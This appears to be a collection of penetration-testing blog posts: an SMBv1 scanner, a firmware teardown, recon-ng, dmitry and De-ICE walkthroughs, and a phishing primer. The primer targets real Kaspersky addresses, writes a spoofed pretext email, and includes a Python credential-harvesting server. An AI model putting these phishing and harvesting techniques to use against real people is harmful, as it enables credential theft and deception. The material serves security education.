
Recently, I was asked to test all SMB-enabled devices on a fairly large network to find any hosts that still supported SMBv1. This was about a month before Nmap released their SMB version enumeration NSE script. I quickly threw together a script using Impacket from Core Security. The initial script was about 10 lines including the imports, and it only allowed a single set of hardcoded input files. It was also single threaded, taking about 4 seconds per address, so each iteration took almost a full day to complete. Testing a patching program with it was untenable.

As we’re huge fans of code re-use, I wrapped the script in my tried-and-true threading modules, re-learned argparse, and created a functional Python program that only negotiates SMBv1 connections to a host. By performing only the SMBv1 negotiation, and not even including options to enumerate other dialects, I avoided duplicating the functionality from Nmap and don’t have to worry about false positives.
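
For reference, the core of the check is tiny. Here is a minimal sketch of the idea, not the full script from the repo, using placeholder addresses: Impacket's impacket.smb.SMB class speaks only the SMBv1 dialect, so a completed negotiation means the host still accepts SMBv1.

# Minimal sketch (assumes Impacket is installed); the published script adds
# argparse handling, input files, and output options on top of this.
from concurrent.futures import ThreadPoolExecutor

from impacket.smb import SMB  # impacket.smb implements only the SMBv1 dialect


def supports_smbv1(host, port=445, timeout=4):
    """Return True if the host completes an SMBv1 negotiation."""
    try:
        # Constructing the SMB object performs the protocol negotiation.
        SMB('*SMBSERVER', host, sess_port=port, timeout=timeout)
        return True
    except Exception:
        return False


if __name__ == '__main__':
    hosts = ['192.0.2.10', '192.0.2.11']  # placeholder addresses
    with ThreadPoolExecutor(max_workers=20) as pool:
        for host, result in zip(hosts, pool.map(supports_smbv1, hosts)):
            if result:
                print('%s supports SMBv1' % host)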

This script will generate a large number of ARP requests during testing; this is per the RFC when connecting to port 139. If stealth is important, reduce the thread count using the -t option. Happy hunting and enjoy scanning for SMBv1.

We have added the repo to our GitHub. The script requires netaddr, pycrypto, and impacket.
Install with:
 pip install pycrypto
 pip install impacket
 pip install netaddr
python [*options]
usage: smbv1 scanner [-h] [-i INPUT [INPUT ...] | -f FILE] [-t THREADS]
 [-o OUTPUT] [-v]

******* * * * * * * * Check SMB for Version 1 Support * * * * * * * *******

optional arguments:
 -h, --help show this help message and exit
 -i INPUT [INPUT ...], --input INPUT [INPUT ...]
 IP Address in CIDR Notation
 -f FILE, --file FILE file containing list of IPs to check
 -t THREADS, --threads THREADS
 Number of Threads
 -o OUTPUT, --output OUTPUT
 Output File Name
 -v, --version show program's version number and exit

******* * * * * * * * * * * * * * * * * * * * * * * * * *******

I recently had an appointment at an ophthalmologist, and because it was in New Mexico, where appointments mean nothing and linear time isn’t a thing, I had a long wait in the exam room. Stay with me, I swear we are going to pen test some stuff. Most of the equipment in the room was from Welch Allyn, so why not take a look at their stuff to see how secure my data would be?

I’m not an amazing reverse engineer; it is on my list of things to improve so I took this opportunity to dig into some firmware upgrades. I’ve looked through firmware in the past and decompiling binary files never got me any results.

I was able to find the firmware for the Welch Allyn RETeval-DR; it isn’t sold in the United States, but the file was available for download without authentication.

Welch Allyn RETeval-DR™ Firmware
Version 2.5.0 | November 11, 2015
System requirements: Windows XP, Windows 8 and all previous versions
File type: .fw | File size: 35.2 MB

I used the ‘file’ command to learn some things about the .fw file type.

root@kali:~/Desktop/RETeval-DR# file reteval-2.5.0.fw 
reteval-2.5.0.fw: Zip archive data, at least v2.0 to extract

A zip archive, I know what to do with those. At this point I assumed that this was going to be another binary file and wasn’t super excited. Extracting the contents of the zip file reveals a bunch of .img files and an install script.

.fw File Contents

My first thought was that the file might contain a login of some sort or some other sensitive data. The install script contains some checksum validation and uses dd to write the images to disk. A very helpful piece of text: the offset for each image appears directly after the seek= in the dd commands.
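
If you want those offsets collected in one place, a quick throwaway sketch like the one below pulls the if= / seek= pairs out of the installer. The script name here is a placeholder; use whatever the .fw archive actually contains.

# Hypothetical helper: list which image gets written where on the target disk.
# Assumes the installer is a shell script containing lines roughly like
#   dd if=rootfs.img of=/dev/... seek=123456 ...
import re

with open('install.sh') as handle:  # placeholder name for the installer script
    script = handle.read()

for image, offset in re.findall(r'dd\s+if=(\S+).*?seek=(\d+)', script):
    print('%s -> seek offset %s' % (image, offset))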

dd offset values

I mounted the rootfs.img and poked around the file system.

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data# mount -t auto rootfs.img mnt/
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data# cd mnt
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt# ls
bin  boot  dev  etc  lib  lib32  linuxrc  lost+found  media  mnt  opt  proc  root  run  sbin  sys  tmp  usr  var

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cat passwd
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cd shadow
bash: cd: shadow: Not a directory

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cat shadow

Pretty sure this means that the root password is blank…OPSEC 101. Almost 90% of penetration testing is asking yourself, ‘What would happen if I did this?’ So, what would happen if I wrote these images to a new disk on a virtual machine?

VMWare Blank Drive


/dev/sdb added

We will need to install pv for the installation to work; pv monitors the progress of the data as it is piped from the unzip step to the dd command in the install script. Also, we need to make the script executable before we try to use it.

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# apt-get install pv
<Redacted the install text>
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# chmod +x 
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# ./ --help
  -a <archive name> (required)
  -b update boot loader too
  -d <destination> (required)
  -f fresh install (on PC)
  -n numeric progress
  -v print firmware version
  First time programming: -a firmware.fw -f -d /dev/sdc
  Firmware update: -a firmware.fw -d /dev/mmcblk0
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# ./ -a ../reteval-2.5.0.fw -n -f -d /dev/sdb
<Redacted the install text>
/dev/sdb after dd

I used fdisk /dev/sdb to set the bootable flag on partition 1 (/dev/sdb1); the a command toggles the flag and w writes the change.

fdisk Set Bootable

I couldn’t get it to boot independently in a VM, and I couldn’t get sdb3 or sdb4 to mount on my Kali Linux box. I tried -t auto and it failed, and I also tried every Linux filesystem type I could, with no luck. Oh well. In a few minutes we found the default password for the device and determined whether we could boot the drives in a VM. Not bad for an eye appointment.

Disclosure Notice: We contacted Welch-Allyn on May 17, 2017 and notified them of the issue. As of June 30th they had not given me any feedback about mitigation status so I am releasing this. Forty five days is more than enough time to mitigate this vulnerability.


Let’s take inventory of the information we now have and decide where we will go from here.


Figure 1 – Information Inventory

Using Modules

The three commands we used (show domains, show contacts, and show companies) will help us to decide which modules to use. The show modules command will display a list of modules to choose from.

show modules

Figure 2 – show modules

As a quick note for reading module names, the “-” delimiter divides each module into “what you have” and “what you want.” So the command below reads as: I have recon/domains, I want hosts (from shodan_hostname).

use recon/domains-hosts/shodan_hostname

Figure 3 – recon-ng to shodan module

The red text indicates that an error occurred when running the module. The green text indicates the new elements added to the database.


Figure 4 – shodan summary

The module added hosts, so running the show hosts command will show the additions. Notice that we have ports as well.

show hosts

Figure 5 – show hosts results

Notice this command displays the row id, the host, the ip address, and the module that was used.

show ports

Figure 6 – show ports results

Remove Unwanted Entries

If we want to stay in the .com domain, we need a way to remove the .hk and other domains.

help delete

Figure 7 – help delete results

Remember, show ports was the last command we ran, so ports was the table we viewed. The delete command removes the selected rows ONLY from the ports table. To validate that the command worked, we will check the table again.

show ports

Figure 8 – Cleaned ports table

The .hk domains are still present in the hosts table.  You will need to remove them from each table.

show hosts

Figure 9 – show hosts results

Exporting Data and Report Generation

Now that we’ve imported data from an outside source, run several modules inside recon-ng, and even deleted data from the database, it’s time to create our report.  There are lots of options to choose from; the search reporting command gives us our choices.

search reporting

Figure 10 – search reporting results

The show dashboard command allows us to look at the modules used and the number of times they’ve been run.  We can also see the amount of information inside the database.

show dashboard

Figure 11 – show dashboard results

Some of the modules I ran were not in this tutorial; from Figure 11 you can see all the modules used. Figure 12 is a continuation of the show dashboard command.  Here you can see the information that is captured in the database, which also makes it easier to create a report or export information.


Figure 12 – show dashboard summary

Exporting Data

We will use the reporting/list module to create a list of IP addresses to use in nmap.  This will tie in several things we’ve already covered.

  • Search for modules
  • Show options
  • Schema command
  • Set command

We will also use Nmap to scan for port 80.

search reporting

Figure 13 – search reporting

use reporting/list
show options

Figure 14 – report/list options

We will run show schema and show only the truncated results, which are enough to see the table schema.

show schema

Figure 15 – show schema

Next, use the set command to give recon-ng the file location.

set FILENAME /location/on/file/system

Figure 16 – set file location

Finally, type run and let recon-ng generate the results. The screenshot is truncated so you can get an idea of what it looks like; your mileage may vary.


Figure 17 – Report Results

<<Truncation Occurs>>


Figure 18 – Report Summary

Using export_iplist.txt as input for our Nmap scan.

  • -iL input list filename
  • -p 80 port to scan
  • -Pn No Ping
nmap -iL export_iplist.txt -Pn -p 80

Figure 19 – Nmap port 80 scan

Create Report

This section will show you how to create an HTML report using the same data set.

use reporting/html
show options
set CREATOR Pentester
set COMPANY United Airlines

Figure 20 – report/html


Figure 21 – set options for report

We used the set command to add the creator and the customer properties for our report. Use the run command to execute the module.


Figure 22 – generate report

Not too exciting but we have our report waiting for us in the .recon-ng folder.


Figure 23 – Report location

Let’s look at that file using a browser.


Figure 24 – File Browser


Figure 25 – HTML Report Example

The next set of figures will show the expanded results for the Summary, Domains, and Locations sections.


Figure 26 – Summary Section


Figure 27 – Domains Section


Figure 28 – Locations Section

We could have done more with the information in the Contacts section. One thing I like to do with this information is expand on it using Pipl; with it, we could really dig into who any of these individuals are to create more effective spear phishing attacks or sales calls. Who are we kidding? We don’t do sales calls.


Figure 29 – Contacts Section

Look through the Vulnerabilities section. We haven’t even started a technical vulnerability assessment and we already have a place to start. OSINT for the win!


Figure 30 – Vulnerabilities Section


Figure 31 – Vulnerabilities Section 2


In this tutorial we covered Recon-ng.  It can be found at  I really enjoy working with this tool.  Just playing with it can give you a better understanding of other ways to gather information about your target.  It really becomes about bread crumbs. How deep can you dig into a company, email address, or person?

Areas we covered:

  • Installation
  • Adding API Keys
  • Creating a Workspace
  • Importing information into the database (grep and awk commands)
  • Using Modules
  • Removing unwanted entries
  • Exporting Data (to use with Nmap)
  • Creating Reports

This primer covers sending spoofed emails from an online service with a link to a cloned credential-harvesting site.  SET provides a clean, menu-driven interface for website cloning and automates the process. Using sendmail directly is also an option in SET; it requires a single change to the configuration and a mail relay to function correctly.

We will again use the Hackerone directory to identify a company but WILL NOT be sending phishing emails to them. This would be really bad form and potentially illegal. For this, we are going to pick on a known antivirus and security company, Kaspersky. Kaspersky was basically chosen because it is a large enough organization that we should be able to find a decent page to clone, and there should be enough email addresses in the wild to generate a list from a few different places.

Email Target List

The heart of any successful phishing campaign is the list of targets. Normally we would use recon-ng to build this list, but in this tutorial, we will do a few manual processes to show other methods. These can absolutely be automated, but for now let’s do it the hard way.

From Pastebin, I searched for “ -license”. This is because the top pastes were all license key dumps, and I was specifically looking for email addresses.

Pastebin Link 1 -
Pastebin Link 2 -

I threw the entire raw contents of both pastes into a text file; now let’s look in a few other places. We already used theHarvester to find email addresses in the recon-ng tutorial, so let’s use it here as well and put the results in the same text file.

root@kali:~/Desktop# theharvester -d -b all

We need to quickly pull out and de-duplicate the email addresses. This isn’t an issue with theHarvester but the pastebin data isn’t structured.

root@kali:~/Desktop# grep kasperskyRawEmails.txt > kasperskyEmail.txt
root@kali:~/Desktop# leafpad kasperskyEmail.txt
root@kali:~/Desktop# sort -d kasperskyEmail.txt > kasperskyEmailSorted.txt
root@kali:~/Desktop# sort -u kasperskyEmailSorted.txt > kasperskyEmail.txt

I used leafpad to clean up a few lines that had extra data. If there were more than a handful, I would have written a sed or awk script to clean it up, but with just a few, it was just as quick to do it manually. I sorted the list with the -d option to put it in alphabetical order, then with -u to get rid of any duplicates. More importantly, by looking at the email addresses, we can easily guess anyone’s email in the company because they all follow the same format. A quick LinkedIn search of people who work at Kaspersky would provide us with another list. Personally, I would remove Eugene Kaspersky from the list since he is the founder, but hey, do what you want. In a normal penetration test, most companies would ask to approve the list and remove or add people as they see fit. For reporting reasons, running wc -l against the approved list will give you the number of emails. From these three searches, we have 142 unique targets.
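
If sed or awk feels like overkill, the same extract-and-dedup step is only a few lines of Python. A minimal sketch, reusing the file names above and a generic email regex of my own:

# Minimal sketch: pull every email address out of the raw paste/harvester data
# and de-duplicate it, roughly equivalent to the grep/sort pipeline above.
import re

with open('kasperskyRawEmails.txt') as handle:
    raw = handle.read()

# Generic address pattern; tighten it to the target domain if needed.
emails = sorted(set(re.findall(r'[\w.+-]+@[\w.-]+\.\w+', raw.lower())))

with open('kasperskyEmail.txt', 'w') as out:
    out.write('\n'.join(emails) + '\n')

print('%d unique addresses' % len(emails))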

While you are in the list, it is always good to look through it and remove any address that is generic or does not direct to an actual person, such as info@ or noreply@ mailboxes. Also, and more importantly, remove anything that will get you caught. I hate to say this, but do not attempt to phish spam@ or abuse@ addresses; if it does work, you probably get extra h4x0r cred, though.
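
Since the harvested addresses follow a predictable format, you can also turn names scraped from LinkedIn into candidate addresses. A purely hypothetical sketch; the first.last pattern and domain below are assumptions, so match them to whatever format the real addresses use:

# Hypothetical: expand a list of employee names into likely email addresses.
def candidates(full_name, domain='example.com'):
    first, last = full_name.lower().split()[:2]
    return ['%s.%s@%s' % (first, last, domain),
            '%s%s@%s' % (first[0], last, domain),
            '%s@%s' % (last, domain)]

for name in ['Jane Doe', 'John Smith']:  # placeholder names from LinkedIn
    print(candidates(name))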

Baiting the Hook

To figure out who to spoof, I went on LinkedIn and searched for IT Support people in the United States working for Kaspersky. I’ve redacted the person’s name, but it is plausible that this person would send out an email about a website, and since they are US-based, an email written in English shouldn’t be a huge red flag. Sending out an English email from an employee based in the Russian Federation, on the other hand, should raise questions; writing it in English and attempting to emulate a translation from Russian may work, as well.

Spoofed From Account

Next, we need to identify a website to clone. We need a page with a login to spoof, so first we will use fierce to identify potential subdomains.

root@kali:~/Desktop# fierce -dns

I looked through the fierce results and settled on the page to be cloned. I like the simple page layout, so there is less chance of the clone going wrong, and based on the title it is a support login page. VPN and Outlook Web Access (OWA) are normally my favorite pages, but occasionally the clone needs to be massaged to make it look normal.

Next, let’s work on the Subject and Body of the email message.

Subject: Support Bot Login Page Test

All, We are testing the new login page for the support bot. The old page had some certificate errors that prevented some users from reaching it, so please let us know if this is still happening, and also test that your password still works before the new system goes live. Let me know if you have any problems.


Spoofed IT Guy

Reading the email, we need to address a few things. First is the certificate error that we get when going to the real site. This is one of the many reasons why it is important NOT to train your users to click through certificate errors. Also, mixing a little bit of truth in with the lie helps make it more effective.

Certificate Error

Second, ask them to log into the page and contact us if there are any errors. Because we will be using a spoofed email and not a fake email address, this adds a little bit of risk that someone will respond and either confuse the IT staff or alert them to the phishing campaign that is underway. Spend some time thinking and crafting the email message to work for the company you’re testing.

We will use SET to clone the website and harvest credentials. The ***** indicates that I’ve redacted the screen text and have only shown the option to choose.

root@kali:/opt/social-engineer-toolkit# setoolkit
 Select from the menu:

1) Social-Engineering Attacks
 2) Penetration Testing (Fast-Track)
 3) Third Party Modules
 4) Update the Social-Engineer Toolkit
 5) Update SET configuration
 6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1
 Select from the menu:

1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) Wireless Access Point Attack Vector
 8) QRCode Generator Attack Vector
 9) Powershell Attack Vectors
 10) SMS Spoofing Attack Vector
 11) Third Party Modules

99) Return back to the main menu.
 set> 2
 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Web Jacking Attack Method
 6) Multi-Attack Web Method
 7) Full Screen Attack Method
 8) HTA Attack Method

99) Return to Main Menu

 1) Web Templates
 2) Site Cloner
 3) Custom Import

99) Return to Webattack Menu


[-] Credential harvester will allow you to utilize the clone capabilities within SET
 [-] to harvest credentials or parameters from a website as well as place them into a report
 [-] This option is used for what IP the server will POST to.
 [-] If you're using an external IP, use your external IP for this
 set:webattack> IP address for the POST back in Harvester/Tabnabbing: 

The address is either the local host (in this case) or the external interface of the server that will be hosting the cloned site. (NOTE: We are currently watching this thread; if a fix gets posted for the OpenSSL/PEM file issue, we will update this.)

[-] SET supports both HTTP and HTTPS
 [-] Example:
 set:webattack> Enter the url to clone:

[*] Cloning the website:
 [*] This could take a little bit...
 Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibility will be affected.
Cloned Site

Real Site

If you want to add SSL support to improve the quality of the attack, SET absolutely supports it with a few changes, and there are services that will issue free SSL certificates. I’ve highlighted the differences in the preceding images.

[*] Printing error: zipimporter() argument 1 must be string, not function

The best way to use this attack is if username and password form
 fields are available. Regardless, this captures all POSTs on a website.
 [*] The Social-Engineer Toolkit Credential Harvester Attack
 [*] Credential Harvester is running on port 80
 [*] Information will be displayed to you as it arrives below: - - [27/Apr/2017 16:11:47] "GET / HTTP/1.1" 200 -
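
Conceptually, the harvester side is nothing magic: it is just a web server that serves the cloned page and logs anything POSTed back to it. A stripped-down Python 3 illustration of the idea (this is not SET's code, and the redirect target is a placeholder):

# Illustrative only -- a bare-bones credential "harvester" that logs every
# POST body it receives. SET does this (plus the cloning and reporting) for you.
from http.server import BaseHTTPRequestHandler, HTTPServer


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the cloned login page here; omitted for brevity.
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'<html>cloned login form goes here</html>')

    def do_POST(self):
        length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(length).decode(errors='replace')
        print('[+] POST from %s: %s' % (self.client_address[0], body))
        # Send the victim on to the real site so nothing looks broken.
        self.send_response(302)
        self.send_header('Location', 'https://example.com/')
        self.end_headers()


HTTPServer(('0.0.0.0', 80), Harvester).serve_forever()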

Now, we send out bait and see who we can catch.

 Set the Hook

We have used a couple of different email spoofing services and have recently settled on Sharpmail. They work well, and they don’t get blacklisted by mail servers. It is a paid service, though, if you want premium features such as removing the tag line at the bottom or sending SMS messages. Below is a screen showing how to send messages in Sharpmail; there is an argument to be made that putting a few of the addresses together in the To: line would make it more believable, but for now, they are all in the BCC: line.

Sharpmail Example

Finally, we would send this email out and simply wait to see who got hooked.

SET has a nice live update when credentials are captured and also packages up a report at the end.

Live Output

HTML Report

From here it would depend on what the client requests. Do you use these credentials to attempt further exploitation or just produce the report? Your testing might be done, or you could have potentially generated a bunch of additional work for yourself.


I’ve conducted phishing campaigns at many different companies. Overall, I probably have a 10% success rate; some were a little higher and some a little lower. That doesn’t sound too impressive, right? How many successes does it take to compromise a network? One. One user clicking on a link in an email exposes the entire network, so for most companies I got significantly more than that one needed success. How did I do it? More importantly, what tricks do I have up my sleeve that other penetration testers could steal? At almost every conference you will see a talk on some super sweet post-exploitation tool or privilege escalation technique; if you can talk to the speaker, 9 times out of 10 they gained initial network access through phishing. Phishing is the dirty pen testing secret that we all do but nobody wants to talk about, because it isn’t nearly as cool as remote code execution.

Finding Targets

Generally, there are two methods for generating lists for phishing campaigns: either the client will provide you a list (which is boring) or you can find valid targets and get the list approved. Where can you find valid targets? I consider a valid target any email address already exposed on the internet.

  • Recon-ng
  • Linkedin
  • Pastebin
  • Google
  • FOCA
  • Web content

In the future, we will look at each of these methods in depth, but for now, let’s just assume you have a list.

Sending Emails

The FROM line in the address is just as important as the TO. Are you sending a fairly generic phishing email hoping to get a few clicks? If so, your success rate is going to be fairly low. For a company without security awareness training in place, this might be appropriate, but most tests are meant to be more sophisticated. I am going to show you how I make the sausage; fair warning, it isn’t pretty.

If you are going for a generic attempt without a spoofed email address, you can try to get an email address from any of the normal providers like Gmail or Outlook. Registering an email that looks at least semi-plausible will help. Outlook has a built-in limitation for new accounts to restrict the number of emails sent until the account ages or milestones are met (such as phone number verification). Also, filling in the display name and information to seem legitimate will increase the chance of success. CompanyHelpDesk@gmail is better than PhishingAttempt6@yahoo.

If you are allowed to spoof email addresses, a few better options are available. Setting up sendmail and sending everything through Social-Engineering Toolkit (SET) is a great option. Using a webmail service that allows spoofed emails is also a great option and protects your fixed IP from being banned for email abuse. It is also smart to pay the small fee that allows the footer to be removed. If you are performing a penetration test, it is the cost of doing business. I personally like using Sharpmail out of the UK but have used a couple other servers, as well. Sharpmail has SMS functionality, which I have used on assessments in the past.

Everyone has seen poorly crafted phishing emails signed Help Desk, so you need to step up your game and do some research. Find the company on LinkedIn and figure out who the IT person is. Getting an email from a help desk address signed Gary, when employees know there is an IT person named Gary, is way more convincing. The correct tone is important too: a busy help desk person sending a curt email stating, ‘We are testing a new web server for email, can you log in and test it? -Gary‘ is more believable than a two-paragraph, formal-sounding email. I rarely even hide my URL behind link text for the same reason; I wouldn’t do that as a systems administrator in a company, and I want my emails to be believable.

Some clients will also want you to get the email text and targets approved. I’ve had to add typos and dumb down my emails for clients who wanted to make them easier to spot. Those assessments are the best, because you can almost guarantee success when even the employer thinks their people will click on anything. Most of these assessments come shortly after the company has been breached by a phishing attack.

Microsoft Outlook Web Access or a VPN login page are my two favorite sites to clone in SET. We will conduct a primer on SET soon, but for now, just know that I use the clone website function with the capture credentials module. I’ve used Browser Exploitation Framework (BeEF) in the past, but keeping it simple usually works better.

Now What?

The first time I was assigned a phishing campaign, I had no idea what to do. I fired up SET but didn’t have sendmail installed and configured. The client for that assessment wanted multiple tests done. Not only was it testing employee awareness, it was testing the email security appliance in place. Sendmail took me most of the day to get set up and start sending emails. Let’s just say that it did not go well; the appliance blocked all my spoofing attempts and having an included URL hidden behind link text tripped the heuristics, with the end result being the end users didn’t even get the attempts. Not only that, but because I worked from home, the IP I paid for from my ISP got blacklisted for sending spam.

What lessons did I learn? One, I rarely use my own sendmail account anymore. Two, I’ve gotten simpler in my messages. Three, I respond to replies. What? That’s right, when your login fails on the credential harvesting site I’ve created and you reply to the email complaining, I’ll tell you I’m working on it and that I will let you know when it’s fixed. Why? So that you don’t tell other people you’re having a problem and potentially prevent them from giving me their credentials. Sneaky right?

Reporting on phishing is simple; we normally produce a statistics-based report that shows how many credentials were gathered versus the number of emails sent. We avoid giving specific names, which clients always want, because it is normally a systemic issue, not a user issue. We have performed custom redirects, after credential harvesting, to a site that forces users to complete a short training on phishing awareness.

Pulling it All Together

Now that you have read this tradecraft on phishing, you may be asking, “what are the next steps?” Next, we are going to create some primers on setting up phishing campaigns using sendmail and Sharpmail and using SET to clone a website and harvest credentials. This simply gave you a glimpse into the mindset of how we think about attacks and some of the pitfalls encountered.

For quite some time fierce was my go-to DNS testing tool (we even wrote a post on it), and I still use it extensively, but recently I have been using dmitry in parallel. dmitry is the Deepmagic Information Gathering Tool, and while it doesn’t have the subdomain brute-force functionality that I love in fierce, it automates other functions that I never realized I was tired of doing manually.

Why do we spend so much time on DNS? A company’s DNS servers are a gold mine of information during a penetration test. This is especially true for organizations that have an improperly configured split-view DNS where internal records are exposed externally. It is also pretty common to find test, development, or integration servers that have been exposed in DNS and then forgotten about. Why spend all of your penetration testing effort on the fully patched and hardened server when the test server from 2006 is available? DNS helps find the path of least resistance. Once again we will be using the HackerOne directory to demonstrate this tool on real-world systems. For dmitry I chose one of the listed domains.

root@kali:~# dmitry -h
Deepmagic Information Gathering Tool
"There be some deep magic going on"

dmitry: invalid option -- 'h'
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
  -o     Save output to %host.txt or to file specified by -o file
  -i     Perform a whois lookup on the IP address of a host
  -w     Perform a whois lookup on the domain name of a host
  -n     Retrieve Netcraft.com information on a host
  -s     Perform a search for possible subdomains
  -e     Perform a search for possible email addresses
  -p     Perform a TCP port scan on a host
* -f     Perform a TCP port scan on a host showing output reporting filtered ports
* -b     Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
*Requires the -p flagged to be passed

We are going to simply step through the options with a brief description and talk about what information would be useful during different phases of a pen test.

-i and -w perform a whois lookup in slightly different ways; we will combine them to get an IP address and a whois lookup at the same time. For our primer the domain name would probably be the preferred starting point, but if you only had an IP address to start with, the -i option would get the same results. I’ve used dmitry to track down the source of a brute-force attack on an internet-facing system; it wasn’t very amazing, it was a compromised host in a medium-sized company.


Figure 1 – Whois Lookup

I’ve redacted the screenshot since whois reports are fairly extensive, but we now know the IP address we are working with and the subnet it belongs to. We also know that it is registered with RIPE, the regional internet registry that covers Europe, which makes sense because the host is in the Netherlands.

Next we will use the -n option to pull Netcraft’s information for the domain. Netcraft is an internet security firm out of the UK that does anti-spam and anti-phishing work. We learn two things from the -n output: first, the target is reputable enough not to have been reported for spam/phishing, and second, the IP address for the system has changed, so they probably have a load balancer or are hosting from multiple locations. This also makes sense.


Figure 2 – Netcraft Report

Let’s use the -s option to look for subdomains. This isn’t super interesting, but at least it found a few that we could look at if we were testing the entire domain.


Figure 3 – Subdomain Search

The -e option is useful for starting phishing attacks or feeding information into recon-ng, which we also have a tutorial on (hint, hint). This specific test was super anticlimactic, but you get the idea.


Figure 4 – Email Search

dmitry also has a built-in port scanner. I like the banner enumeration function, so I normally stack the -b option onto the -p port scan.


Figure 5 – Port Scan

Wow, that is a lot of steps. Why wouldn’t you just stack all of those options into one command and write the output to a file instead? Because then how would this whole primer be longer than one page? The last screenshot is how I actually use it, with everything combined into a single run (something like dmitry -winsepb -o results.txt <domain>), reading from the output file instead of off the screen.

Figure 6 – Combined Testing

The domain I picked was a boring choice for this tool, but with luck whatever domain you point it at will be more fruitful.

I had never done the S2 LiveCD; honestly, I didn’t know it existed until I was looking for the download links for the series 1 set. This is basically a clean, up-to-date walkthrough using Kali. All of the spoilers are kept in the walkthrough section below so as not to ruin the pen testing fun. Have fun, and hopefully this is helpful.

De-ICE S2.100

Download Link:

Scenario: The scenario for this LiveCD is that you have been given an assignment to test a company’s network to identify any vulnerabilities or exploits. The systems within this network are not critical systems, and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency of previous (or current) staff.

Default IP:

1. Port scan host and create list of open ports
2. Obtain access to file system
3. Perform post exploitation
4. Rummage about in the file system
5. FINAL FLAG: Find salary and Social Security information for employees

Spoilers and Walkthrough

Using netdiscover to find potential addresses, I found the .100 and .101 addresses active.

root@kali:~# netdiscover

 Currently scanning:   |   Screen View: Unique Hosts            
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300               
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
                 00:50:56:c0:00:08      1      60  Unknown vendor
                 00:50:56:f0:ee:65      1      60  Unknown vendor
                 00:0c:29:1f:c6:f0      1      60  Unknown vendor
                 00:0c:29:1f:c6:f0      1      60  Unknown vendor
                 00:50:56:fe:3a:17      1      60  Unknown vendor

I’ll start by creating a Metasploit workspace and doing a port scan of the host. The name of the workspace is terrible, since I didn’t know yet that I would be differentiating between series 1 and 2, but it works.

workspace -a de-ice2-100
workspace de-ice2-100
db_nmap -T5 -p 0-65535 -A

I have had great success in numerous penetration tests with data found on FTP servers, so I will start there. Personally, I like to use the FileZilla GUI; I know that goes against everything that makes pen testing fun, so feel free to use the command line. The anonymous user doesn’t get a directory listing or show any files, so let’s dig into the vsftpd service. Searchsploit is the local version of the Exploit-DB database, with the added benefit of not having to click on the CAPTCHA box.
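
If you would rather script the anonymous check than click around in FileZilla, a quick sketch with Python's ftplib does the same test; the target address is a placeholder for whatever the .100 host is on your network.

# Quick anonymous FTP check: log in as anonymous and try a directory listing.
from ftplib import FTP, error_perm

target = '192.168.1.100'  # placeholder -- use the .100 address on your network
try:
    ftp = FTP(target, timeout=5)
    print(ftp.login())     # anonymous login by default
    ftp.retrlines('LIST')  # directory listing (empty on this box)
    ftp.quit()
except error_perm as err:
    print('Anonymous login refused: %s' % err)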

root@kali:~# searchsploit vsftp
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/
vsftpd 2.3.2 - Denial of Service             | linux/dos/16270.c
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/
vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
--------------------------------------------- ----------------------------------

Nothing specific for that version, and mostly denial-of-service exploits, so for now we can move on. Let’s see what mischief we can get into with the web site. From the website directory we can harvest a list of users and email addresses for use later; in a real-world penetration test this would be the start of a well-orchestrated phishing campaign.


The .101 website looks like a generic policy site, so let’s dig deeper into both of them. Nikto finds some generic problems with the server but nothing that is immediately exploitable.

nikto -h
nikto -h
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.

Let’s rummage around in that directory. Nada.

During the Nmap scan we found that the SMTP server has the VRFY verb enabled, allowing us to determine potential user accounts for a brute-force attack. The username list is fairly simple: last name only, first name only, and first initial plus last name.
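
Building that list, and even checking it without Metasploit, is only a few lines of Python. A sketch using the names harvested from the website and the VRFY support in smtplib (the target address is a placeholder):

# Build the candidate username list (last, first, first-initial+last) and,
# optionally, verify each one directly over SMTP with the VRFY verb.
import smtplib

target = '192.168.1.100'  # placeholder -- the .100 mail server
names = [('Philip', 'Pirrip'), ('Abel', 'Magwitch'), ('Estella', 'Havisham')]

candidates = set()
for first, last in names:
    candidates.update({last.lower(), first.lower(), first[0].lower() + last.lower()})

with open('s2100users.txt', 'w') as out:
    out.write('\n'.join(sorted(candidates)) + '\n')

smtp = smtplib.SMTP(target, 25, timeout=10)
for user in sorted(candidates):
    code, message = smtp.verify(user)
    if code in (250, 252):
        print('[+] %s: %s' % (user, message.decode(errors='replace')))
smtp.quit()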


Metasploit has an SMTP enumeration module that we will use.

msf > use auxiliary/scanner/smtp/smtp_enum 
